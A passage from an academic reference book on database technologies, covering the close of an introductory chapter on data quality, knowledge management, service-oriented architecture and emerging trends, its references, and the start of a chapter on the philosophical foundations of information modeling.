Organization Size and Data Quality When organizations are small, checking the accuracy and quality of the data is (arguably) quite easy. The same person that captures the data is often the same person who is conducting the analysis on it, and they know if the data is accurate or not. However, as organizations grow, the problem of data quality often grows simultaneously because the size of the database grows, and analysts are left to wonder about the accuracy of the systems built to capture the data (point of sale systems for example). For example, most of the national consumer databases contain relatively high levels of inaccuracies, and worse degrade at a relatively stable and predictable rate, with the result that a top cause of business failure is inaccurate data (Laudon and Laudon, 2007). The problem has become so severe that many organizations have created a position of Data Administrator, whose job, among others, is to ensure the accuracy of the data stored in the database. Nord, Nord, and Xu (2005) investigated the dimensions of data accuracy and found that accuracy, timeliness, completeness, and consistency should each be considered as well as simply whether the data is correct or incorrect.
Organizational Memory and Information Processing (Knowledge Management) Organizations have long realized that organizational memory is critical to their performance and even survival (Zhang and Zhao, 2006). As employees resign, retire or are for other reasons removed from the organization, the knowledge that they hold regarding (perhaps) how to best accomplish the company’s competitive goals can often leave with them. A possible solution to this dilemma has emerged in the form of KM or Knowledge Management Systems. While these systems were discussed earlier as a form of Enterprise system, KM systems play a large role in capturing, preserving, and utilizing the organizational memory of many companies. Among many other research efforts in the area, Nilakanta, Miller, and Zhu (2006) proposed a framework for developing a technology-based system capable of managing organizational memory. They proposed a core system consisting of a Knowledge Engine that would connect four elements; an organizational memory system, a database, a “knowledge percolator”, and a “knowledge navigator.” While implementation of the proposed system was not accomplished as part of that research, the initial steps taken indicate the importance organizational memory is assuming. Other research efforts have focused on the problem of making tacit knowledge explicit, or codification as it is commonly called. Nonaka (1994) defined tacit knowledge as knowledge that resides (essentially) in the mind of a human expert. Earl (2001) proposed that in addition to codifying tacit knowledge, personalization of knowledge is also a means to managing knowledge. Hansen (1999) provided some evidence that an issue faced by organizations called the search-transfer problem was related not only to the codification dilemma, but also to the social network structure of the organization. Social networks will be discussed in more detail later. King (2006) provided a framework for what he called an EKO (Effective Knowledge Organization. He proposed that how the organization processes information is an important underlying element for creating an EKO. His EKO architectural framework included four elements, Innovation, Intellectual Property Management, Organizational learning, and Core Knowledge Management, surrounding Information Processing. In that framework, the other elements could not function without a stable accurate information processing scheme.
Web Impact on Business There is little doubt that in both practice and research the Internet and the Web have impacted business profoundly. E-commerce and E-business strategies and business models have become competitive ne-
xlvi
cessities for businesses in many industries. In such an environment, business often finds itself searching for ways to reconfigure its traditional systems to support Web-based commerce. Approaches include a Services-based model, in which common services are created and stored in modules or libraries, and then formally contracted for use as they are needed. This eases the burden on systems developers, since “new” systems can often be composed from libraries of existing services. The Service model will be discussed in more detail later, in the Emerging Trends section. Meanwhile, businesses still face the problem of moving their legacy systems to a Web-based model. Sang, Follen, Kim, and Lopez (2002) proposed a means of moving legacy systems directly to the Web. Their approach required structured code to be re-written and placed within objects, and successfully demonstrated that the approach would work with C++ and CORBA. Naturally, much middleware was used to facilitate the transformation. Other approached used what was called an indirect migration. This idea essentially used a re-engineering approach to re-analyze the systems and reformulate them from an object-oriented perspective. Li, Huang, Yen, and Chang (2007) proposed a formal five step methodology for migrating legacy systems to Web-Services architecture.
Implementation and Success Issues of Enterprise and Large Database Systems As systems become more and more complex, implementation of those systems can, and often does become as complicated as the systems themselves. This becomes especially apparent for Enterprise systems of the various types discussed earlier, since they often include a significant database component in addition to the other system modules. Measuring the success of such systems also becomes quite difficult as well. For example benefits can be intangible, and attributing business success to a particular project can be uncertain. Determining the critical success factors underlying a particular implementation project is an approach that has been used for some time in the MIS field. While some researchers (Somers and Nelson, 2001) have proposed as many as 22 critical success factors related to ERP implementation, Nah, Islam, and Tan (2007) proposed that a set of four critical success factors could be used to predict success. They formally tested their model via a survey, with the results suggesting that three of the factors, enterprisewide communication, a project management program, and coordination of project activities positively affect ERP implementation. The fourth factor, top management support, did not necessarily affect implementation success in that study. Whether 22 or only four success factors, the importance of the management effort related to implementation of complex information systems is easily apparent in the formulation of the success factors. Another point to consider is whether success factors and other managerial issues related to implementation of ERP systems will also be relevant to other types of enterprise systems as well as database systems, which, as noted earlier, are often a part of an enterprise system implementation.
Social Network Impact on Organizations Underlying every organization is the social structure that represents the relationships among people inside and outside of the company. In that context a social network most often refers to a network among people, and social networking sites both inside and outside organizations are gaining in importance. In light of the popularity of MySpace, Facebook and the other social networking sites, constructing a data model that pertains to social networking has risen to importance. Mitra, Bagchi, and Bandyopadhyay (2007) proposed a data model specified for a social network structure. The development of the model is important not only because of the proliferation of social networking sites, but also because many organizations have begun to create internal social networking sites, such as blogs or wikis, for gathering and disseminating organizational knowledge.
xlvii
EMERGING TRENDS Database technologies have become firmly entrenched as critical components in nearly every business. Data warehouses, data mining and sophisticated analytic techniques have become necessities rather than advantages for many businesses. The Web has assumed an ever increasing role in many organizations business models, and techniques have been developed that ease the collection and movement of data from the front end Web interface to the core database systems. What are the newest issues and emerging trends in that environment? Some emerging trends we have already spoken of, however briefly. Among the most important trends is the continuing movement to the Web. While much work has been done in that area, much more remains. Service Oriented Architecture (SOA) has emerged as a relatively recent trend for business (Erickson and Siau, 2008). SOA follows a similar path as that of Web Service discussed earlier, in that it is based on a Service Model. The idea is to create re-usable code modules that can be contracted and composed as needed to perform various tasks in the organization. The code modules are then entered into a repository or library, such as UDDI, where organizations can contract and bind the services offered to their own systems. Many of them can be seen to provide a transition between the underlying data base and the Web client user interface that is commonplace for many businesses now. In other works the Web client approach can work just as well for internal users as it does for customers on the Web. SOA also provides a way for organizations to continue to use legacy databases longer than was though possible, by essentially replacing the aging DBMS with a Web client interface. The practice is not without controversy however, with detractors insisting that it is just a band aid approach and a temporary solution to a much more serious problem. The Semantic Web also represents a relatively recent trend that is likely to continue. Tim BernersLee (1998, 2004) describes the Semantic Web as “…a set of connected applications for data on the Web in such a way as to form a consistent logical web of data.” Basically, the idea is to code Web pages in languages that result in the data on the pages being queryable as in a database. An extremely rough analogy that is making waves currently is Google’s search engine technology. While this exposition does not purport to say that Google is a semantic web, the algorithm(s) used by Google make it possible to perform very sophisticated searches of the Web. Now, take Google’s ideas and use Berners-Lee’s RDF (Resource Description Framework) model as a relatively rigorous architectural basis, and imagine what will be possible in the Web of the future. As previously discussed, Knowledge Management systems are gaining increasing importance to organizations, and underlying KM development lies a knowledge base in addition to the requisite database. Mobile commerce and mobile commerce applications will likely make huge gains in the near future, and developing applications and technologies to collect, store and present data will be crucial to this effort. Increasing automation as seen in Wal-Mart’s (and many other companies) adoption of RFID (Radio Frequency Identification) technologies must also be seen as a call to enhance the performance robustness of databases and all related technologies. The reason for this is that such systems are moving closer and closer to real time operation, and analysts will likely want real time response as well. Allowing data storage nodes to be other than simply data, such as music pictures, videos, etc. will also likely assume ever greater importance, and this means a greater merging of the traditional relational data model with an object-oriented model. This was discussed earlier, but is likely to remain at the forefront of database development. As data stores themselves become ever larger, the analytic and querying tools need to remain capable of handling the larger loads required. Finally, as more and more data migrates to the Web, enhanced security measures must be developed to counter the increasingly sophisticated attack perpetrated not only by hackers, but also by organized crime and terrorists.
xlviii
CONCLUSION This introduction chapter has provided a brief history of database technologies. At the same time it has also chronicled a number of the more important present trends and practices related to research, development, and deployment of database technologies to business, as well as the impact of database upon the businesses and organizations utilizing them. The chapter ends with speculation on emerging and future trends related to the area of database technologies. It should be apparent that databases in many ways represent the core of business, since without them operation in today’s world would be extremely difficult if not outright impossible for nearly every company of any size. Database design, the technologies supporting it, and the implementation practices have come a long way in the past 40 years, and the future should be no less exciting.
REFERENCES Armstrong, W. (1974). “Dependency structures of data base relationships”. Proceedings of the 1974 IFIP Congress. (pp. 580-583). Batra, D., Hoffer, J., & Bostrom, R. (1988). A Comparison of User Performance Between the Relational and Extended Entity Relationship Model in the Discovery Phase of Database Design. Proceedings of the Ninth International Conference on Information Systems. (pp. 295-306). Beeri, C. & Bernstein, P. (1979). Computational problems related to the design of normal form relation schemes. ACM Transactions on Database Systems, 4(1), 30-59. Berners-Lee, T. 1998 (2004). Semantic Web Road map. Whitepaper. Retrieved November 29, 2008 from http://akira.ruc.dk/~jv/KIIS2004/roadmap.pdf. Bosak, R., Clippinger, R., Dobb, C., Goldfinger, R., Jasper, R., Keating, W., Kendrick, G., & Sammet, J. (1962). An Information Algebra. Communications of the ACM, 5(4). 190-204. Chen, P. (1976). The Entity-Relationship Model – Toward a Unified View of Data. ACM transactions on Database Systems, 1(1). 9-36. Childs, D. (1968). Feasibility of a set-theoretical data structure – a general structure based on a reconstituted definition of relation. Proceedings of the 1968 IFIP Congress (pp. 162-172). Codd, E. (1970). A Relational Model of Data for Large Shared Databases. Communications of the ACM (pp. 377-387). DiPaola, R. (1969). The recursive unsolvability of the decision problem for a class of definite formulas. Journal of the ACM, 16(2), 324-327. Earl, M. (2001). Knowledge Management Strategies. Journal of Management Information Systems,18(1), 215-233. Erickson, J. & Siau, K. (2008). Web Services, Service Oriented Computing, and Service Oriented Architecture: Separating Hype from Reality. Journal of Database Management, 19(3), 42-54. Fagin, R. (1977). Multivalued dependencies and a new normal form for relational databases. ACM Transactions on Database Systems, 2(3), 262-278.
xlix
Fagin, R. (1983). Degrees of acyclicity for hypergraphs and relational database schemes. Journal of the ACM, 30(3), 514-550. Fagin, R., Mendelzon, A. & Ullman, J. (1982). A simplified universal relation assumption and its properties. ACM Transactions on Database Systems, 7(3), 343-360. Fillat, A. & Kraning, L. (1970). Generalized organization of large databases – a set theoretic approach to relations. MIT MAC TR-70 (By reference from Ullman, 1987). Google. (2008). Retrieved June 20, 2008 from http://www.google.com/search?hl=en&defl=en&q=define: database&sa=X&oi=glossary_definition&ct=title. Hadzilacos, V. (1988). A Theory of Reliability in Database Systems. Journal of the ACM, 35, 1, 121145. Hansen, M. (1999). The Search-Transfer Problem: The Role of Weak Ties in Sharing Knowledge Across Organization Subunits. Administrative Science Quarterly, 44(1), 82-111. Inmon, W. & Hackathorn, R. (1994). Using the Data Warehouse. Wiley and Sons. Kroenke, D. (1995). Database Processing: Fundamentals, Design, and Implementation. Prentice Hall. Kuhns, J. (1967). Answering questions by computer, a logical study. RM-5428-PR, Rand Corp. (By reference from Ullman, 1987). Laudon, K. & Laudon, J. (2007). Management Information Systems: Managing the Digital Firm. Prentice Hall. Li, S., Huang, S., Yen, D., & Chang, C. (2007). Migrating Legacy Information Systems to Web Services Architecture. Journal of Database Management, 18(4), 1-25. McFadden, F., Hoffer, J., & Prescott, M. (1999). Modern Database Management. Addison Wesley. Miller, G. (1956). The Magical Number Seven, Plus or Minus Two: Some Limits on Our Capacity for Processing Information. The Psychological Review, 63(2), 81-97. Mitra, S., Bagchi, A., & Bandyopadhyay, A. (2007). Design of a Data Model for Social Network Applications. Journal of Database Management, 18(4), 51-79. Nah, F., Islam, Z., & Tan, M. (2007). Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations. Journal of Database Management, 18(4), 26-50. Newell, A. & Simon, H. (1972). Human Problem Solving. Prentice Hall. Nilakanta, S., Miller, L., & Zhu, D. 2006. Organizational Memory Management: Technological and Research Issues. Journal of Database Management, 17(1), 85-94. Nonaka, I. (1994). A Dynamic Theory of Organizational Knowledge Creation. Organizational Science, 5(1), 14-37. Nord, G., Nord, J., & Xu, H. (2005). An Investigation of the Impact of Organization size on Data Quality Issues. Journal of Database Management, 16(3), 58-71.
l
ODBMS.org. (2008). Retrieved July 3, 2008 from http://www.odbms.org/introduction_history.html. Sang, J., Follen, G., Kim, C., & Lopez, I. (2002). Development of CORBA-based Engineering Applications from legacy FORTRAN Programs. Information and Software Technology, 44(3), 175-184. Somers, T. & Nelson, K. (2001). The Impact of Critical Success Factors Across the Stages of Enterprise Resource Planning Implementations. Proceedings of the 34th Hawaii International Conference on Systems Sciences. Thomson, P. (2005). Text Mining, Names and Security. Journal of Database Management, 15(1), 5459 Thuraisingham, B. (2005). Privacy –Preserving Data Mining: Development and Directions. Journal of Database Management, 16(1), 75-87. Ullman, J. (1987). Database theory—past and future. Symposium on Principles of Database Systems – Proceedings of the sixth ACM SIGACT-SIGMOD-SIGART symposium on Principles of database systems. (pp. 1-10). Watson, R. 1999. Data Management: Data and Organizations (pp. 400). Wiley and Sons. Yin, X. & Pedersen, T. (2006). Evaluating XML-Extended OLAP Queries on a Physical Algebra. Journal of Database Management, 17(2), 85-116. Zhang, J., Liu, H., Ling, T., Bruckner, R., & Tjoa, A. (2006). A Framework for Efficient Association Rule Mining in XML Data. Journal of Database Management, 17(3), 19-40. Zhang, D. and Zhao, J. (2006). Knowledge Management in Organizations. Journal of Database Management, 17(1), i-vii. Zhao, L. & Siau, K. (2007). Information mediation Using Metamodels: An Approach Using XML and Common Warehouse Metamodel. Journal of Database Management, 18(3), 69-82.
li
About the Editor
John Erickson is an assistant professor in the College of Business Administration at the University of Nebraska at Omaha. His research interests include UML, software complexity and systems analysis and design issues. He has published in journals such as the CACM, JDM, and in conferences such as AMICIS, ICIS WITS, EMMSAD, and CAiSE. He has also co-authored several book chapters.
Section I
Fundamental Concepts and Theories This section serves as the foundation for this exhaustive reference tool by addressing crucial theories essential to the understanding of database technologies. Chapters found within these pages provide an excellent framework in which to position database technologies within the field of information science and technology. Individual contributions provide overviews of data warehousing and database management systems, while also exploring critical stumbling blocks of this field. Within this introductory section, the reader can learn and choose from a compendium of expert research on the elemental theories underscoring the research and application of database technologies.
1
Chapter 1.1
Philosophical Foundations of Information Modeling John M. Artz The George Washington University, USA
INTRODUCTION For the past few decades, there have been articles appearing periodically in the information systems research literature criticizing the field for a lack of theory, no core set of concepts, and no accepted paradigm. It is difficult to tell exactly when this critical self-examination began. However, one reasonable starting point would be an article by Peter Keen (1980) at the First International Conference on Information Systems, which begins with the observation, “At present, MIS [management information systems] research is a theme rather than a substantive field” (p. 9). Keen goes on to criticize MIS research for a lack of a cumulative tradition and other factors that are key requirements for a scientific discipline. A few years later, Culnan (1986) picked up on this idea, cited Keen’s remarks, and embarked upon an analysis of the information systems research literature looking for common themes and potentially competing paradigms. Culnan
points out, “As a field matures, new theories are proposed and compete until paradigms emerge” (p. 156)—or, at least, that is the way it is supposed to work. Culnan concludes that the IS research literature consists of “research themes rather than paradigms or even well defined subfields” (p. 167) but excuses the field for its shortcomings with the observation that “MIS is very much a young academic field” (p. 167). While Culnan took an empirical approach to analyzing the state of the art in IS research, Weber (1987) took a theoretical approach sketching out what we should be looking for. Weber observes, “If a science progresses only when it has a paradigm, it behooves the members of a field to seek paradigms and to articulate paradigms via normal science as their primary research activities” (p. 9). He also remarked, with regard to referent disciplines, that “the IS discipline must develop its own paradigm rather than rely on other disciplines’ paradigms if it is to survive in the long run as a distinct discipline” (p. 4).
Orlikowski and Iacono (2001) coalesced the concepts of paradigm, cumulative tradition, and core concepts in the idea of the “IT artifact”: We believe that the lack of theories about IT artifacts, the ways in which they emerge and evolve over time, and how they become independent with socio-economic contexts and practices, are key unresolved issues for our field and ones that will become even more problematic in these dynamic and innovative times. (p. 133) This certainly sharpens the focus of the investigation, but what is the IT artifact? Weber (1987) comes the closest to answering that question. In his article he cites E. F. Codd’s (1970) paper as one of the most cited articles in information systems and one that could be considered a candidate as a paradigm suggesting that the IT artifact is some kind of data model. Later, in an editorial in MIS Quarterly, Weber (2003) points out, “After a long period of discernment, we found we could identify only one class of phenomena, for which theories sourced from other disciplines seemed deficient—namely, phenomena associated with building conceptual models and designing databases” (p. viii). So perhaps the IT artifact has something to do with information models or information modeling. This is plausible since data modeling and information modeling are, perhaps, the only intellectual developments that are unique to information systems. Yet the theories in these areas are sketchy at best. However, theory does not just appear spontaneously: It must be developed. One of the ways in which this can be done is to take general theories from other areas, apply them to phenomena in information systems, and then advance them by making them more specific to IS. The purpose of this article is to do just that. First we begin with a brief description of the process of information modeling followed by a very brief discussion of earlier attempts to address the philosophical foundations. Then we introduce four concepts
2
from metaphysics that are highly relevant to information modeling. These four concepts are as old as philosophy itself and yet when applied to information modeling, they are as relevant to database design as they were to philosophers over the past few millennia. These four concepts are (a) the concept of identity, (b) the problem of universals, (c) teleology, and (d) the correspondence vs. coherence views of truth. Each concept will be explained in turn, as will its implications for information modeling. Each of these concepts also provides a foundation from which a theory of information modeling and, eventually, a theory of information systems can be built. So, following the introduction of the concepts, we will explain how they were identified.
INFORMATION MODELING Information modeling is the first step in database design, sometimes referred to as conceptual database design. In this step in the design process, the information modeler examines the domain of interest and determines the classes of entities that will be represented in the database and the relationship between those classes. In a typical university example, one entity class may be Students while another entity class may be Courses. The relationship between Students and Courses is that Students take Courses. As the modeler proceeds, attributes are identified for each entity class. These attributes represent facts of interest that are common to all instances of a class. If a particular student has additional facts, those facts are overlooked in order to have a set of facts common to all students. When the modeler is finished, the conceptual database design is represented in an information model that contains entity-class descriptions, attributes of the entity class, relationships between entity classes, and, possibly, additional information about the nature of those relationships such as cardinality and optionality. In the construction of the information model, a
Philosophical Foundations of Information Modeling
variety of philosophical assumptions are made that address which classes should be represented in the model, where those classes come from, how those classes are identified or constructed, and the truth status of the information in the database.
EARLIER WORK This is not the first attempt to provide some philosophical grounding for information modeling. The most notable attempts, to date, include William Kent’s (1978) Data and Reality, and Information Systems Development and Data Modeling: Conceptual and Philosophical Foundations by Hirschheim, Klein, and Lyytinen (1995). Data and Reality is a truly astonishing work that is an arcane classic among a far too limited set of readers but is likely destined to become one of the first classics of information systems. That is to say that a century from now, readers will still be referring to the concepts in this book whereas little else of what we say today will be remembered. Kent touches on most of the key points in this article. He asserts, There are a few basic concepts we have to deal with here: • •
•
Oneness Sameness. When do we say two things are the same or the same thing? How does change affect identity? What is it? In what categories do we perceive the thing to be? What categories do we acknowledge? How well defined are they? (pp. 3-4)
The first two bullets refer to the concept of identity, and the third bullet refers to the problem of universals. Both of these concepts will be addressed below. The problem with Kent’s book, despite its enormous insight for the time, is the fact that important questions are raised with
insufficient conceptual structure surrounding them. Thus, the book is likely to leave one more confused than enlightened. If one were to read the book, go off and study metaphysics for a while, then come back and read the book again, it would make a great deal more sense. Yet few people do that, and Data and Reality is unfortunately relegated to a cult classic. Hirschheim et al. (1995) take a different approach, attempting to ground information systems in social philosophy. They criticize prevailing views of information systems because of the prevailing assumption that information systems are “technical systems with social consequences.” In opposition to this view, they assert, “In recent years, however, there has been a growing interest in viewing IS as social systems that are technically implemented. They serve as the agent for significant social interactions” (p. 14). Reconceptualizing the phenomenon of information systems, they state, “Hence items of information are meanings that are intended to influence people in some way” (p. 14). This is to say, information systems are not benign representations of reality. They are instead constructed realities, and those constructions serve some purpose. The intentional nature of information systems development is brought into clear focus when they Hirschheim et al. (1995) say, “Intentions in systems development are expressed by objectives” (p. 17). This notion that information systems are constructed for a purpose is picked up in this article in the section on teleology. The teleological approach to information systems development relies on the identification of systems development objectives. Despite their strength in social philosophy and teleology, Hirschheim et al. are a little weak in the metaphysics. They nod toward the problem of universals with a brief mention of nominalism (p. 21), but focus on the social aspects of information systems and their potential for social change. It is interesting to observe that in juxtaposing the work of Kent (1978) with the work of
3
Philosophical Foundations of Information Modeling
Hirschheim et al. (1995), we see a tension in philosophy that goes all the way back to the pre-Socratic philosophers (Gottlieb, 2002). This tension is between the view that reality is in a constant state of change and the view that reality must be stabilized in order to be understood. The pre-Socratic philosopher Heraclites is best known for his assertion that you cannot step in the same river twice and viewed reality as being in a constant state of flux. Parmenides rejected the views of Heraclites on the basis that knowledge is not possible if you accept change as fundamental. We must impose order on reality in order to understanding it, and Parmenides viewed the philosophy of Heraclites as destructive to the project of knowledge (Roochnik, 2002). While this comparison may be overreaching a bit, it is an apt comparison to point out that this tension between views of reality has a long history and cannot be resolved in this article. The views provided here are consistent with Kent and Parmenides and must be considered within that framework.
FOUNDATION CONCEPTS When an information model is constructed, a wide variety of philosophical assumptions come into play. Following are four philosophical concepts that lie at the foundation of those assumptions. They are the concept of identity, the problem of universals, teleology, and the correspondence vs. coherence views of truth. Each will be discussed in turn. Following the introduction of these concepts, some additional discussion will be provided explaining how these concepts were derived as the foundational concepts for information modeling.
CONCEPT OF IDENTITY The concept of identity is both deceptively simple and profoundly important. It is one of the most
4
fundamental concepts in all of metaphysics and goes right to the heart of how we organize our knowledge and make sense out of the world. In its simplest form, the concept of identity addresses the problems that arise when we use the word same (Stroll, 1967). Suppose that you are going to the deli to buy a soda, and your friend asks you to get him a diet Coke. When you get to the deli, you find that all they have is diet Pepsi, so you get your friend one of those. When you return, you find your friend is upset because he asked for a Diet Coke. “But, I got you a diet Pepsi,” you respond. “What difference does it make?” “They are not the same,” your friend replies. Being a good friend, you walk to another deli a couple of blocks further and get two diet Cokes. When you return, you place the two diet Cokes on the table and offer one to your friend. At this point, another friend comes in and you explain how the first friend would not accept the Diet Pepsi because Pepsi and Coke are not the same. So your new friend points to the two cans of Coca Cola, one of which is in front of you and the other of which is in front of your other friend, and asks, “Are those two the same?” “Of course they are,” you respond. “They are both Diet Cokes!” “But, if they are the same,” your friend presses, “then you have the same thing in two places at the same time.” At this point, you have to give up having friends or learn a little more about philosophy. The concept of identity addresses the problems that arise when we group things together for the purposes of intellectual economy. We can group individual items temporally, which gives rise to the problem of the persistence of identity across
Philosophical Foundations of Information Modeling
time. Or we can group individual items together based upon kind, which gives rise to the problem of universals. An example of the persistence of identity across time is seen in the fact that I drive the same car I drove 10 years ago even though the car I drove 10 years ago was new, while the car I drive now is somewhat worse for the wear and worth a whole lot less money. How can the same car be old and new, expensive and inexpensive? More germane to the process of information modeling is the problem of universals. When we create entity classes in an information model, the underlying assumption is that the entities are entities of the same kind. This notion is reinforced by the relational principle of entity integrity, which asserts that a relational table should not contain more than one kind of entity, and the entity relationship modeling rule that requires internal consistency. That is, all members of an entity class are entities of the same kind. But where do kinds come from and how do we know when an instance of an entity is of a particular kind? This is the problem of universals.
PROBLEM OF UNIVERSALS When we use the word same to refer to same kind, we are organizing the things of the world into categories. Categories are useful because they help us organize our knowledge efficiently. When I point to a tree and call it a tree, I am assigning it to a category. By doing this, I can apply my general knowledge of trees to the specific tree at which I am pointing. The thing at which I am pointing is actually an instance of a tree, but we do not make that distinction in normal speech. Yet, philosophically, we do make that distinction. The instance at which I am pointing is called a particular, and the category to which I assign it is called a universal. The problem of universals attempts to address the question, where do universals come from? Is a tree a tree because it is a member of the set of trees
or is it a member of the set of trees because it is a tree? This enigmatic question goes to the heart of universal construction. Is a grouping formed from things of the same kind, or are things of the same kind because they are part of the same grouping? There really is no easy answer to this question, and philosophers have provided a variety of answers over the centuries (Artz, 1997). A less enigmatic view of the problem of universals is to ask, when we create categories to organize our knowledge, where do those categories come from? Are the categories real and hence discovered, or are categories constructed and, if so, according to what criteria? The problem of universals is fundamental to information modeling because the process of constructing entity classes is no more or less than the problem of universals. That is worth repeating because the central problem in information modeling is the problem of universals. Understanding what has been said about the problem of universals provides great insight into the process of information modeling. The assumptions one makes on the issue of whether universals are discovered or constructed are called ontological assumptions. A survey of the literature on information modeling reveals that the ontological assumptions made by information modelers are often confused and conflicting (Artz, 2006).
TELEOLOGY Teleology comes from two ancient Greek words telos and logos. Telos means ultimate purpose and a logos is an explanation. So, teleology is a study of things in terms of their ultimate purposes. The use of teleological thinking is almost as old as the root words from which it is derived. Aristotle, who first introduced teleological thinking, believed that an adequate understanding of a phenomenon required an understanding of four causes: formal, material, efficient, and final (Gottlieb, 2002). The formal cause is the shape that a thing takes on.
5
Philosophical Foundations of Information Modeling
A boat and a picnic table, for example, can be made out of the same material, but take on very different shapes. The material cause is the stuff out of which the thing is made. A boat may be made out of wood or steel. The efficient cause is the procedure by which the thing is made. A boat can be manufactured, constructed from lumber, or carved out of a log. The final cause is the ultimate purpose of the thing. The purpose of a boat is to float on water. It is easy to see that a ship builder who does not understand the final cause of a boat may not be very successful in building one. The final cause is ultimately a teleological explanation, which Aristotle required of all scientific explanations including those for inanimate or physical phenomena. This led to some problematic interpretations such as fire rises because it wishes to return to the sun, or objects fall because they wish to return to the center of the earth. This attribution of purpose to physical objects does not sit well with one’s modern sense and indeed Galileo dismissed teleological explanations from his view of astronomy, leading eventually to the modern view that physical objects simply follow the laws of nature and do not have any ultimate purpose (Losee, 1993). It is fairly easy and appropriate to dismiss teleology from physics, but that does not necessarily dismiss this perspective from all scientific and intellectual endeavors. For example, in biology, there is an ongoing debate regarding teleological explanations of biological systems. Can one fully understand the functioning of the kidney if one does not know that the purpose of the kidney is to remove waste materials from the bloodstream? It would seem that one could not. However, does that purpose exist in nature or does the observer ascribe that purpose in order to improve our understanding of the functioning of the kidney? Clearly, this debate can be easily distracted by the philosophical question of whether or not purposes exist in nature or if purposes are simply superimposed on nature in order to make things easier to understand. Most people would gladly accept
6
the second and lesser of these claims by saying that it does not matter if purposes exist in nature. Superimposing purposes on nature in order to make things easier to understand is a good enough justification for a teleological perspective. As we move from biological systems to human systems such as government or economic systems, teleological perspectives become increasingly more important. These systems evolved or were constructed to satisfy some sort of human need. To discuss them without discussing the purpose that they serve is to miss the point completely. One can easily dismiss teleological thinking from physics. In biology it becomes more difficult and in social science it is almost impossible to dismiss the teleological perspectives. Human systems must always be understood in terms of purposes or they are not understood at all. The most extreme example of teleological thinking is in the construction of artifacts such as an information system. The point here is that we should always understand the purpose for which we are building an information system or the purpose for which we are designing a database. If we do not understand the ultimate purpose of a thing we are designing, it is unlikely that we will design the right thing. Hence, all database design and information systems development should be teleological (Artz, 2001). This is not to say that it is. An alternative view is that we do not always know what we are doing when we build information systems, and that the act of building is a learning process (Checkland, 1989). However, one has to ask if it is better to build and validate an information system based on well-defined objectives, or if it is acceptable for an information system to be the by-product of a learning process whereby the developers know when they are finished what they should have done, an insight not reflected in the final product.
Philosophical Foundations of Information Modeling
CORRESPONDENCE VS. COHERENCE VIEWS OF TRUTH It is easiest to introduce this idea through an immediate example. Suppose a person believes the assertion that all trees have branches and leaves. Is this true? We can consider three levels at which we might consider this question. First, let us assume that the person believes this to be true because he or she heard it somewhere and has not seen any glaring challenges to this claim. We can call this level of truth naïve adaptation and say that the statement, while not being totally true, is true enough. If your criterion for truth is naïve adaptation, then true enough is good enough and something is true if you do not encounter any evidence to the contrary that you cannot easily dismiss or explain away. Suppose, next, that the person has a curious mind. He or she begins to examine this claim by checking with the physical world. The person notices that some trees have needles instead of leaves. It is also noticed that even trees with leaves often lose them in the winter. So the assertion that all trees have leaves does not correspond to what actually occurs in the real world. Hence, it is not true. This is the correspondence view of truth. The correspondence view of truth (Prior, 1967) asserts that in order for a thing to be true, it must correspond to a thing or event in the real world. So, instead of believing that all trees have leaves, this person may have to qualify the claim to say that all broadleaf trees have branches and leaves in the summer because that is what actually occurs in the world. Finally, let us say that this person has an orderly mind and realizes that the term tree is wantonly misused. For example, there are shoe trees and family trees that have nothing to do with the kind of tree about which he or she is thinking. The person sets out to define the concept of tree so that it includes all instances of what he or she believes are trees and no instances of things not believed to be trees. The person is now adhering
to the coherence view of truth. The coherence view of truth says that the world is a messy and chaotic place. In order for something to be true, it has to make sense. So this person makes the world coherent by creating, organizing, and making sense of categories and relationships. Trees, in the new orderly world, have a clear definition, and nobody will make the mistake of believing someone is actually a leaf on a family tree. So the coherence view of truth (White, 1967) suggests that truth is not something derived from the world, but rather it is an order superimposed on the world. All three of these views of truth can be seen as options in the database design process. How does the concept of truth apply to a database? The answer is quite simple. When one executes a query in a database and gets an answer, that answer should be the same as the answer they would get had they interrogated the real world. The point of a database, after all, is to model some aspect of the real world so that database users can interrogate their model of the world rather than having to interrogate the world each time. Kent (1978) gives recognition toward this idea: “An information system (e.g. database) is a model of a small, finite subset of the real world.…We expect certain correspondences between constructs inside the information system and in the real world” (p. 1). Now we can consider each level of truth with respect to databases. The naïve adaptation level of truth is a good model for many databases. The records in the database often reflect the way information is processed rather than the information itself. So the extent to which the records actually model the domain is, to some extent, coincidental. One can see this easily by selecting any record type in the database and asking the question, what set of entities in the real world does this set of records correspond to? If this question is difficult to answer, then the truth level of the database is naïve adaptation at best. However, as long as the information provided by the database is reasonably useful and satisfies the basic processing needs of
7
Philosophical Foundations of Information Modeling
the organization, nobody is likely to complain. In order to meet the correspondence criterion, the question from the previous example must be expanded. Tables should correspond to classes of entities. Rows should correspond to specific occurrences of entities. Attribute values should be facts about specific entity occurrences. Foreign keys should correspond to regular relationships between entities in one class and entities in another class. The strength of correspondence is that when a user asks a question of the database, the answer he or she gets is not just a calculation in the database, but it is also true in the real world. Finally, the aspect of the real world that is being modeled may not be sufficiently refined to gain the full benefits of modeling it in a database. This occurs when the semantics of the domain are ambiguous. For example, in the university environment, the word course is often used both for a course and a course offering. This leads to problems in modeling the domain. Let us say that Professor Smith is teaching two sections of one course, and one section of another course. If you ask about the number of courses Professor Smith is teaching this semester, you cannot get a clear answer. The answer may be two if you actually mean course, but it could also be three if you mean course offerings. Often times, the semantics of a domain are too muddled to model directly, and in these cases we have to go beyond the correspondence criteria to the coherence criteria. That is, we have to use the database to superimpose order on the domain.
BRINGING IT ALL TOGETHER The concepts just discussed, though well established in metaphysics, are intellectually distant from the practice of information modeling and, most likely, entirely foreign to most readers of this article. Hence, this section will provide a few bridges. A reasonable question to ask, at this point, is, how does one come to these particular concepts
8
as the philosophical foundations of information modeling? How do we know that there are not other philosophical concepts that might provide a better foundation? In order to answer this, we have to go back to the process of information modeling. When we design a database, we examine the application domain for the things of interest about which we would like to collect information. We call these things of interest entities. But it would not do to have a separate table for every entity. If we did, we would have Bob’s Table, Bill’s Table, Sarah’s Table, and so on for students. Beyond the obvious absurdity of having individual tables for entities, it would make it difficult to generalize our knowledge. That is, we could answer specific questions about Bob, Bill, or Sarah, but it would be difficult to answer general questions about the group containing these students. So instead of having tables for every entity, we group these entities into categories that we call entity types. Tables in a relational database represent entity types. This is a much more economical representation and allows us to extend our knowledge by characterizing the members of the entity type. For example, we put Bob, Bill, and Sarah into an entity type called Student and then we can determine the average age of our students, average grade point average, and so on. But as we make this transition from individual occurrences to grouping, we have to ask, where do these categories come from? Are they part of the real world waiting to be discovered or do we construct them to serve a particular need? If 